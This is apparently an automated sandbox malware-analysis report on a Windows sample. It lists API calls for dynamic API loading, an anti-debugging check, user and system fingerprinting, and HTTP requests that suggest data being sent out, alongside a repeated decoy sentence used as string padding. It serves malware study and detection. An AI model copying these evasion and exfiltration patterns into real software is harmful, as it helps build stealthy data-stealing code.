                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                  • strlen.MSVCRT ref: 004046F0
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                  Strings
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                  • API String ID: 2127927946-2218711628
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                  APIs
                                                  • GetProcAddress.KERNEL32(76210000,00848748), ref: 004198A1
                                                  • GetProcAddress.KERNEL32(76210000,00848A60), ref: 004198BA
                                                  • GetProcAddress.KERNEL32(76210000,00848A78), ref: 004198D2
                                                  • GetProcAddress.KERNEL32(76210000,00848A18), ref: 004198EA
                                                  • GetProcAddress.KERNEL32(76210000,00848AA8), ref: 00419903
                                                  • GetProcAddress.KERNEL32(76210000,008499C8), ref: 0041991B
                                                  • GetProcAddress.KERNEL32(76210000,008468E8), ref: 00419933
                                                  • GetProcAddress.KERNEL32(76210000,00846928), ref: 0041994C
                                                  • GetProcAddress.KERNEL32(76210000,00848A30), ref: 00419964
                                                  • GetProcAddress.KERNEL32(76210000,00848A90), ref: 0041997C
                                                  • GetProcAddress.KERNEL32(76210000,00848AC0), ref: 00419995
                                                  • GetProcAddress.KERNEL32(76210000,00848A00), ref: 004199AD
                                                  • GetProcAddress.KERNEL32(76210000,00846B48), ref: 004199C5
                                                  • GetProcAddress.KERNEL32(76210000,00848A48), ref: 004199DE
                                                  • GetProcAddress.KERNEL32(76210000,00876368), ref: 004199F6
                                                  • GetProcAddress.KERNEL32(76210000,00846A68), ref: 00419A0E
                                                  • GetProcAddress.KERNEL32(76210000,00876380), ref: 00419A27
                                                  • GetProcAddress.KERNEL32(76210000,00876308), ref: 00419A3F
                                                  • GetProcAddress.KERNEL32(76210000,00846948), ref: 00419A57
                                                  • GetProcAddress.KERNEL32(76210000,00876320), ref: 00419A70
                                                  • GetProcAddress.KERNEL32(76210000,00846C08), ref: 00419A88
                                                  • LoadLibraryA.KERNEL32(008762F0,?,00416A00), ref: 00419A9A
                                                  • LoadLibraryA.KERNEL32(00876338,?,00416A00), ref: 00419AAB
                                                  • LoadLibraryA.KERNEL32(00876398,?,00416A00), ref: 00419ABD
                                                  • LoadLibraryA.KERNEL32(008763B0,?,00416A00), ref: 00419ACF
                                                  • LoadLibraryA.KERNEL32(00876350,?,00416A00), ref: 00419AE0
                                                  • GetProcAddress.KERNEL32(75B30000,00875FF0), ref: 00419B02
                                                  • GetProcAddress.KERNEL32(751E0000,008761D0), ref: 00419B23
                                                  • GetProcAddress.KERNEL32(751E0000,00876038), ref: 00419B3B
                                                  • GetProcAddress.KERNEL32(76910000,00876080), ref: 00419B5D
                                                  • GetProcAddress.KERNEL32(75670000,00846BC8), ref: 00419B7E
                                                  • GetProcAddress.KERNEL32(77310000,00849B28), ref: 00419B9F
                                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00419BB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: Fs$NtQueryInformationProcess
                                                  • API String ID: 2238633743-1241331114
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                  • StrCmpCA.SHLWAPI(?,0087B030), ref: 0040493A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0087AFA0), ref: 00404DE8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                  • HttpOpenRequestA.WININET(00000000,0087AF20,?,0087A1B8,00000000,00000000,00400100,00000000), ref: 00404B15
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 2402878923-2180234286
                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocNameProcessUser
                                                  • String ID:
                                                  • API String ID: 1206570057-0
                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                  APIs
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitInfoProcessSystem
                                                  • String ID:
                                                  • API String ID: 752954902-0
                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
